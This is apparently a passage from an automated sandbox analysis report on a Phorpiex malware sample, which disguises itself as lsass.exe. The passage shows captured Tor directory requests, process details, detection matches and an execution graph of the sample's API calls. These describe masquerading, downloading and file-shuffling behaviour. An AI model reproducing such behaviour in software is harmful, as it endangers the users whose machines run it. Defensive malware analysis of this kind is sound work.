72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.649756199.58.81.140804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:41:30.793708086 CET141OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 199.58.81.140
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:41:30.905777931 CET1286INHTTP/1.0 200 OK
            Date: Wed, 10 Jan 2024 14:41:30 GMT
            Content-Type: text/plain
            X-Your-Address-Is: 102.165.48.42
            Content-Encoding: deflate
            Expires: Wed, 10 Jan 2024 15:00:00 GMT
            Vary: X-Or-Diff-From-Consensus
            Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1
            Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^
            Jan 10, 2024 15:41:30.905858994 CET714INData Raw: 97 37 e2 09 d5 3f 9c af fc 52 df 4b 66 34 3c e7 fa cc da f9 c9 ac 08 b9 de 59 e0 6f b6 21 6e 0d 76 65 eb 87 8d 31 f8 f7 bf b0 9d b3 b8 40 9f 9e b0 f0 55 11 19 76 ea 12 24 45 53 62 57 20 81 4c 03 91 84 aa 2a f0 90 67 04 06 fd 4e 92 38 96 22 15 28
            Data Ascii: 7?RKf4<Yo!nve1@Uv$ESbW L*gN8"(3z2,D/'ibdscCWsd.UTYJbV*, r*#R,d@+32zBVR9+D^R*/>1hrnlm[O>)I,I
            Jan 10, 2024 15:41:30.905956030 CET1286INData Raw: 3f ec 14 59 91 ea ff bf ff 64 ba 11 e7 ba 6b 3f c5 e8 18 8a 34 ec 78 79 9e 64 9d 76 fb db 03 e8 a4 11 28 fa 8a 9d 4e 91 fa 5f d2 4c 27 74 03 f9 f7 4e 7d fb ea 0d f0 f3 f2 d2 47 bb 77 da 41 97 e8 31 46 c1 15 da 80 fc 2c 7b 71 b8 1d ea 8d 41 b8 2e
            Data Ascii: ?Ydk?4xydv(N_L'tN}GwA1F,{qA.t$S]EI@Q8e~;<1*$-I,`S,)2N;@$!]b!]<JHMhX 3]8g<H42/S'3"ZBh6|="|_wK(5=omeZ
            Jan 10, 2024 15:41:30.906059027 CET1286INData Raw: fc 30 00 c9 82 2a d4 d3 a0 7e 11 21 ca 8b 59 55 e5 ab ed 79 25 c1 bd 35 b5 54 9a d5 2f e3 90 5d ab c4 62 96 0e a3 1d 1d 44 3a b3 3d f9 2b ee 6a 38 5b 5e cb d2 ab b1 7e e3 16 e8 0e 60 3a 14 8a e0 70 06 83 72 33 1a 05 ec dc f7 6d ef 8f 1a f3 93 7b
            Data Ascii: 0*~!YUy%5T/]bD:=+j8[^~`:pr3m{R1II6Q)N,x5M_Xf#oZ[A.zfpiv&?6|7NjQ19Wvn!8='mKL7ehY{+s
            Jan 10, 2024 15:41:30.906147003 CET1286INData Raw: 4b c5 e1 25 13 17 95 da b8 2a 90 b3 a1 d0 55 01 d1 e6 c8 d7 7b 24 a4 08 fe 4d ed ed 07 6d fa be 06 f1 89 6c ca 7e 68 d2 3e 7a 42 16 3b bd 38 b4 b4 04 c5 d2 83 b1 1a c8 63 d1 5d 82 ee de 05 28 05 d6 07 53 7b c4 16 91 4a cc 17 82 db 77 26 ed 70 53
            Data Ascii: K%*U{$Mml~h>zB;8c](S{Jw&pS]SPkj?|pgjv_-v`1^Gpw.%5U7Un|By-lW.s%p\abs;SY."ikf1-Yp}uZ@Z+<Kimn
            Jan 10, 2024 15:41:30.906213045 CET1286INData Raw: 76 f8 0e 60 d1 2a a6 4c a3 d3 41 d1 27 7e fc 41 9b 3c d8 67 fc 56 d3 93 41 21 e2 b4 2a d2 23 b3 2e 2b 77 c8 b4 9d 89 d6 1e 9d da bd 23 bf d1 78 22 3f f3 89 30 b8 1d 25 6d b9 74 33 5f 3d ba 56 dc 0d f7 74 9e 0f 1a 19 00 8a 12 19 e1 6d d3 13 c2 7b
            Data Ascii: v`*LA'~A<gVA!*#.+w#x"?0%mt3_=Vtm{MO=O+8bl*qS,GZuES .9Z61E!OeOS7fQXvbq,.|SmOxNE%3%v~_vRlfA(F
            Jan 10, 2024 15:41:30.906321049 CET1286INData Raw: 72 29 db 24 a1 24 c6 d6 1a 94 de 4d b7 9d 7c 73 34 e7 bb a9 d2 3f 6e 99 ca 6b 42 94 f1 44 27 4f e0 71 16 9c c5 62 2e 35 e1 85 01 e2 a1 73 1b e6 7f 18 d6 e1 5b be 65 5b 7e ee d9 26 b2 88 ef a2 b3 e7 40 65 6a 1a e9 a8 55 04 97 8a 17 06 d4 b4 47 1d
            Data Ascii: r)$$M|s4?nkBD'Oqb.5s[e[~&@ejUGB.s4_L&N>fe$qJAb"g:`*F^$Mmfb^bg5A,!e?|^e>NF >1n`q
            Jan 10, 2024 15:41:30.906405926 CET1286INData Raw: cd e2 9c d9 32 71 53 15 23 e4 f1 80 98 03 99 17 e8 e9 43 16 87 e9 7b cd 0f a5 bb 1c 60 c6 08 e7 30 48 05 87 bf c6 0c d3 6d 2f 32 1e 4c f8 ab 35 4b e6 8e 4a 9c e1 5e c9 58 37 3d 46 dd 60 32 1c ae f7 28 75 de 26 4b aa 1c ef 9b c2 3c 68 11 b3 af 05
            Data Ascii: 2qS#C{`0Hm/2L5KJ^X7=F`2(u&K<h&M,fv:y<o%_+NB=g!:hYh$h}ie{2_rIWov g4:jezb|L$*.#)7!
            Jan 10, 2024 15:41:30.906492949 CET1286INData Raw: 94 dc e7 ec 9d 22 54 f4 d0 57 9b 2e 5a e8 20 8f 50 c3 54 79 cc 11 f1 c4 53 04 4d d3 f4 e3 28 aa 02 ea fe bc 47 cd b4 54 d9 53 3b 2f e3 34 40 26 ad d4 7e f7 46 a7 74 7f 39 19 ce 00 3d 04 16 99 4f a9 65 02 09 f9 b2 b1 dc 8b 72 9c 6e a4 64 aa 9f 93
            Data Ascii: "TW.Z PTySM(GTS;/4@&~Ft9=Oerndv 0{OtJX6'w?af?a;v9O(&U:MH-~biYhyCFZ4M1`T03w`snjbH+1{].]BO5:ERu
            Jan 10, 2024 15:41:30.906559944 CET1286INData Raw: fa 15 99 6a 72 28 6c a0 71 e8 d0 61 28 e1 b1 03 05 ac 10 f1 21 f5 ac 7e ca f5 14 d9 dc f0 4a a0 0d e8 9b b6 56 e7 fb f4 9a c4 b7 43 16 fa 63 d5 24 54 b0 f1 40 69 8d 00 2f 4d 38 e9 38 cb 86 29 9f 70 fa 30 54 f9 66 fc 0b 91 21 eb 69 23 4c 63 c0 30
            Data Ascii: jr(lqa(!~JVCc$T@i/M88)p0Tf!i#Lc0IarP$Is<I2[x]0X}rf{r[IK_Iu?.G*Y;rx=Y\4zX++uqq<dAg{wnE5.O}{
            Jan 10, 2024 15:41:31.013118029 CET1286INData Raw: 37 3a 2e 24 b7 dc d8 86 ee 46 36 ef 54 e1 20 4c db 3b 71 05 38 c0 89 c4 ca b6 04 a5 ab 4e 9d 55 72 cc d6 ac 10 2a d7 c5 20 77 fb 5a ba 7f af e3 02 49 9c dc 0b e0 89 67 51 6c ff b1 92 0b a5 53 ff 27 94 5c 1a f3 6b 1f 4a b9 4c 63 c3 a8 08 11 48 e3
            Data Ascii: 7:.$F6T L;q8NUr* wZIgQlS'\kJLcH_UsrkJDHgFOqdeH8e8H(N\q9'3XBgEjw}Z++F:yOn4M1I4[vzdvy9k5a'+;9"aMvx1u


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.649757149.56.45.20090304596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:41:38.903876066 CET782OUTGET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 149.56.45.200:9030
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:41:39.038306952 CET1286INHTTP/1.0 200 OK
            Date: Wed, 10 Jan 2024 14:41:38 GMT
            Content-Type: text/plain
            X-Your-Address-Is: 102.165.48.42
            Content-Encoding: deflate
            Pragma: no-cache
            Data Raw: 38 cb 94 55 59 93 a2 4c d6 be e7 57 70 d1 17 33 af 63 99 99 90 24 d9 11 15 31 c9 a6 28 82 fb f6 c5 77 81 80 88 22 20 8b a8 bf 7e b0 6a de 6e aa a7 63 16 35 d2 b3 71 92 f3 9c 93 4f e6 69 55 06 39 6f e4 41 a0 df a3 92 87 84 be 89 c2 1b c4 f4 0d 52 89 a7 00 40 1e f0 80 8b fc 20 29 a3 f2 d1 0d 7c 84 31 a4 5c f7 f5 51 f4 be 69 f3 ba f6 61 e2 55 7d b6 f8 30 73 6c 3a 65 ca f3 3e 64 fe 1d 2c 06 7d 93 44 60 b1 37 ef c7 7e 50 5b 22 5d 7a 05 d8 6d 03 24 9f ca fd d9 64 53 67 1b c9 ab 1d 9b b2 50 61 9a b5 8f 08 e1 0e cf 19 55 4a c7 1a 6b 6a 88 d0 11 3e a5 60 6b 38 ae 9e 24 47 e5 06 8d 7c b8 91 1e e6 21 b4 9e 0a 1e 77 c8 6d d8 bf 6e b7 a3 18 a4 d3 be 32 3d ce 9e 05 f7 48 aa 42 cc cb 7a d0 1b 65 07 47 3b d7 fb 59 f6 c8 b2 ac 7a 3c 9c c5 d1 d6 6d b6 d9 99 07 6b b9 3a 4b 30 c4 97 d9 76 67 2f ec ce 5d 04 e1 f4 fd b3 36 dd d6 7e 53 d9 c5 2d 1a bc ba e7 e0 07 12 fc 03 89 55 47 90 c1 61 ba 5f 44 4f 56 a7 76 99 fa 5e 27 b9 28 8b cb 71 88 c5 e9 9e ce dc c7 aa 53 44 3a 97 c5 6e 79 48 f3 0b bf 48 73 1e bc 89 6f e4 0d 0a 7c 9a f0 56 94 54 77 2e cb d3 32 e5 d5 34 29 de 61 17 f1 5a 50 78 9f 42 94 ab ae 77 0c de 11 6f c4 69 ad 96 79 fc 61 1f cc 1b cf fb eb df 4c ca 3c 7d 17 bb b8 91 67 41 e2 7f b8 9b a4 e7 46 c0 1f 02 ab ca e3 3b fc 9b c0 8f 23 2f 4f fd 3f 53 4f 5c df 8f 92 b0 49 32 0b 62 f7 d1 d8 44 2e ab f6 71 54 1c 03 9f 47 00 89 5d 00 bb 80 36 e2 77 28 7f 17 25 ee d0 84 07 79 96 47 49 c9 03 03 aa bc 0c 25 99 d7 0c 0d f0 8c 69 0a af 4b 50 e1 35 02 21 4f 45 4d e0 89 2a 4b 3c 31 74 8d c7 0c 41 ae ca ca e8 12 f0 50 c0 12 86 12 e1 f6 6e e2 d7 91 5f 1e 79 08 88 40 44 28 23 b1 2d ca 12 82 22 15 b8 e0 5e e6 6e 37 4a 0e 69 d7 8f c2 a0 28 79 15 00 95 48 00 4b 8a c1 64 43 87 b2 a6 13 15 13 1d 33 8d 51 4d 55 14 99 4a f4 b5 79 e2 e0 78 1f 69 d1 6a 95 c7 fa 58 99 0e dc 12 0e 58 d8 c3 4a 75 dd 4d f2 d5 aa 23 d3 d2 94 47 87 9b ce a5 49 94 26 af f6 b6 07 7c 36 67 fc 64 a9 58 a6 ca 8f f4 ed e7 20 8c cd fe 90 a5 7d 85 8d 3c 6d 40 c6 60 5d dc 66 3d a9 74 86 fb e1 01 2b 69 2f db 9f 1d b1 27 af 01 a6 31 d0 3a f9 ac 03 c7 7a 5e 5a b6 f8 e8 48 65 38 e1 36 c2 78 04 4f ae 0c 1f 19 8b 87 b5 b0 8a 7c 6d 32 1f 44 7d ef 2a e4 ea 00 62 09 a8 e3 dd ed 9e 5d 66 68 ac 3a fb 70 d0 9b c5 42 78 b4 fa be d8 bb 13 cc 29 e2 3a 49 fb b6 b1 61 62 3e 21 a6 57 9c 9c 95 1e a4 2c 37 eb 31 d2 ae 01 8d d9 1d cb 42 74 98 59 9d 6c d2 89 16 8a a7 b0 70 ac 30 a6 b7 46 fc 77 b5 15 51 98 34 4d fe 1f 61 28 27 fe 89 7a 91 b5 f0 c8 8e 38 fa f4 b0 ab 35 9a eb cb 5a 9d cf 07 4a 8a e2 e9 60 bc 11 67 cb f8 7c 76 6e b9 5e cf 09 5b 48 5c df 58 09 41 71 ac 8d da 99 2d f3 9e 0c e3 24 23 e1 ee 6a 94 a9 b8 36 cb b8 0f 6b 38 9f da 99 3d 57 42 e2 d1 64 ea 6a 66 1d 55 67 3f 72 b0 78 9b d4 5c e5 0a d7 7c 99 e8 05 19 3b e6 64 e1 f6 c9 70 30 d2 dd 85 ac 74 96 ce c8 5e ba a3 7c 39 b5 43 54 eb c2 c4 62 db 42 96 53 f8 df c1 f0 63 16 ba cd 81 29 0a 2f c8 cb 36 1c ea cc 99 cf 7f 32 c3 7c af 1e a8 be 17 d8 5e 35 03 95 5e 86 64 a5 54 b3 0c 66 d2 7c 50 5c 4f 30 0c b5 8a 58 7d 4a 7a d7 ca f4 ca 83 c9 4e d2 d2 59 63 62 eb d8 f6 4d 85 43 d6 63 96 5c 6b ed b1 c7 89 a6 0d 1c 7f 14 6b db d9 72 dd 89 ee 43 69 71 b9 ca 56 7e ba d8 13 9d 9c f3 b5 6a 60 f3 e8 1f ea 8a 1e 89 6a 7a 79 e8 9d 1f 5c f0 24 97 b9 7d 5b c7 55 b2 db 3e 77 f9 49 7b e8 e2 53 c7 fb 9b 2c 08 8b ed c1 db 16 cb 71 11 29 43 ba 6c 55 fe 4b 19 49 99 e6 dd df 54 ce c3 ff 44 f9 e9 8b f2 29 f3 ca ca ba 95 3d 7b 00 fa 40 2c ea f1 48 db bb 83 cd 24 c3 e1 12 a7 f3 e6
            Data Ascii: 8UYLWp3c$1(w" ~jnc5qOiU9oAR@ )|1\QiaU}0sl:e>d,}D`7~P["]zm$dSgPaUJkj>`k8$G|!wmn2=HBzeG;Yz<mk:K0vg/]6~S-UGa_DOVv^'(qSD:nyHHso|VTw.24)aZPxBwoiyaL<}gAF;#/O?SO\I2bD.qTG]6w(%yGI%iKP5!OEM*K<1tAPn_y@D(#-"^n7Ji(yHKdC3QMUJyxijXXJuM#GI&|6gdX }<m@`]f=t+i/'1:z^ZHe86xO|m2D}*b]fh:pBx):Iab>!W,71BtYlp0FwQ4Ma('z85ZJ`g|vn^[H\XAq-$#j6k8=WBdjfUg?rx\|;dp0t^|9CTbBSc)/62|^5^dTf|P\O0X}JzNYcbMCc\kkrCiqV~j`jzy\$}[U>wI{S,q)ClUKITD)={@,H$


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.64976086.59.21.38804596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:41:39.929946899 CET139OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 86.59.21.38
            Connection: Close
            Cache-Control: no-cache
            Jan 10, 2024 15:41:40.637095928 CET85INHTTP/1.0 503 Directory busy, try again later
            Date: Wed, 10 Jan 2024 14:41:40 GMT


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.649761131.188.40.1894434596C:\180771693628709\lsass.exe
            TimestampBytes transferredDirectionData
            Jan 10, 2024 15:41:40.640779018 CET146OUTGET /tor/status-vote/current/consensus.z HTTP/1.1
            Accept-Encoding: gzip
            Host: 131.188.40.189:443
            Connection: Close
            Cache-Control: no-cache


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:15:37:55
            Start date:10/01/2024
            Path:C:\Users\user\Desktop\6K1uYM85lS.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\6K1uYM85lS.exe
            Imagebase:0x9a0000
            File size:114'688 bytes
            MD5 hash:2D5E7BABF1B2D92B56FDA0B9044F889A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:15:38:09
            Start date:10/01/2024
            Path:C:\180771693628709\lsass.exe
            Wow64 process (32bit):true
            Commandline:C:\180771693628709\lsass.exe
            Imagebase:0x770000
            File size:114'688 bytes
            MD5 hash:2D5E7BABF1B2D92B56FDA0B9044F889A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MALWARE_Win_Phorpiex, Description: Detects Phorpiex variants, Source: C:\180771693628709\lsass.exe, Author: ditekSHen
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 72%, ReversingLabs
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:15:38:20
            Start date:10/01/2024
            Path:C:\180771693628709\lsass.exe
            Wow64 process (32bit):true
            Commandline:"C:\180771693628709\lsass.exe"
            Imagebase:0x770000
            File size:114'688 bytes
            MD5 hash:2D5E7BABF1B2D92B56FDA0B9044F889A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:6
            Start time:15:38:29
            Start date:10/01/2024
            Path:C:\180771693628709\lsass.exe
            Wow64 process (32bit):true
            Commandline:"C:\180771693628709\lsass.exe"
            Imagebase:0x770000
            File size:114'688 bytes
            MD5 hash:2D5E7BABF1B2D92B56FDA0B9044F889A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:8
            Start time:15:38:38
            Start date:10/01/2024
            Path:C:\180771693628709\lsass.exe
            Wow64 process (32bit):true
            Commandline:"C:\180771693628709\lsass.exe"
            Imagebase:0x770000
            File size:114'688 bytes
            MD5 hash:2D5E7BABF1B2D92B56FDA0B9044F889A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:41.5%
              Total number of Nodes:884
              Total number of Limit Nodes:17
              execution_graph 6131 9b427a __set_app_type __p__fmode __p__commode 6132 9b42e9 6131->6132 6133 9b42fd 6132->6133 6134 9b42f1 __setusermatherr 6132->6134 6143 9b43e4 _controlfp 6133->6143 6134->6133 6136 9b4302 _initterm __getmainargs _initterm 6137 9b4356 GetStartupInfoA 6136->6137 6139 9b438a GetModuleHandleA 6137->6139 6144 9b1360 6139->6144 6143->6136 6374 9b41c0 6144->6374 6146 9b136d Sleep 6147 9b138e 6146->6147 6148 9b1c99 Sleep 6147->6148 6149 9b13a0 FindWindowA 6147->6149 6376 9b0290 memset InternetOpenA 6148->6376 6151 9b1b62 PathFileExistsW 6149->6151 6152 9b13c0 Sleep DeleteFileW MoveFileW 6149->6152 6151->6147 6183 9b1b0e 6151->6183 6154 9b13f2 6152->6154 6156 9b140a 6 API calls 6154->6156 6157 9b1458 13 API calls 6154->6157 6155 9b1cbe ExitProcess 6156->6154 6161 9b1619 9 API calls 6157->6161 6162 9b1511 8 API calls 6157->6162 6158 9b1bae Sleep FindWindowA 6164 9b1bd5 7 API calls 6158->6164 6158->6183 6159 9b1b9c MoveFileW 6159->6183 6165 9b16c1 8 API calls 6161->6165 6179 9b196e 6161->6179 6163 9b1601 InternetCloseHandle DeleteFileW 6162->6163 6180 9b158c 6162->6180 6163->6161 6164->6183 6167 9b1819 InternetCloseHandle Sleep 6165->6167 6168 9b1746 MoveFileW Sleep MoveFileW DeleteFileW InternetOpenUrlA 6165->6168 6177 9b183e 6 API calls 6167->6177 6167->6179 6175 9b1801 InternetCloseHandle Sleep 6168->6175 6176 9b17a5 7 API calls 6168->6176 6169 9b1cc6 CreateMutexA GetLastError 6170 9b2078 ExitProcess 6169->6170 6195 9b2080 6169->6195 6171 9b1a1b PathFileExistsA 6181 9b1a2a DeleteFileA Sleep DeleteFileW Sleep MoveFileW 6171->6181 6182 9b1a66 FindWindowA 6171->6182 6172 9b1994 FindWindowA 6178 9b19b0 7 API calls 6172->6178 6172->6179 6173 9b15b3 6 API calls 6173->6180 6174 9b1c52 Sleep MoveFileW Sleep DeleteFileW 6174->6183 6175->6167 6176->6175 6184 9b1961 InternetCloseHandle 6177->6184 6185 9b18a6 InternetOpenUrlA 6177->6185 6178->6179 6179->6171 6179->6172 6180->6163 6180->6173 6181->6182 6182->6183 6188 9b1a86 11 API calls 6182->6188 6183->6147 6183->6151 6183->6158 6183->6159 6183->6174 6196 9b1b35 MoveFileW Sleep MoveFileW 6183->6196 6184->6179 6189 9b18cf DeleteFileW MoveFileW Sleep DeleteFileW 6185->6189 6190 9b1900 8 API calls 6185->6190 6186 9b20ba PathFileExistsW 6191 9b2228 FindWindowA 6186->6191 6192 9b20cd MoveFileA Sleep CopyFileA MoveFileA 6186->6192 6187 9b26d7 Sleep GetModuleFileNameW PathFindFileNameW 6193 9b2717 6187->6193 6188->6183 6189->6190 6190->6184 6194 9b2248 9 API calls 6191->6194 6191->6195 6211 9b2116 6192->6211 6201 9b2728 8 API calls 6193->6201 6197 9b233a InternetCloseHandle PathFileExistsA 6194->6197 6198 9b22d8 DeleteFileA InternetOpenUrlA 6194->6198 6195->6186 6195->6187 6196->6183 6204 9b2386 FindWindowA 6197->6204 6205 9b2356 MoveFileA MoveFileA MoveFileA 6197->6205 6202 9b230c DeleteFileW Sleep 6198->6202 6203 9b2322 InternetCloseHandle Sleep 6198->6203 6199 9b214e Sleep FindWindowA 6206 9b2175 6 API calls 6199->6206 6199->6211 6200 9b2131 MoveFileA DeleteFileA 6200->6211 6207 9b27aa Sleep 6201->6207 6208 9b384d Sleep 6201->6208 6202->6203 6203->6197 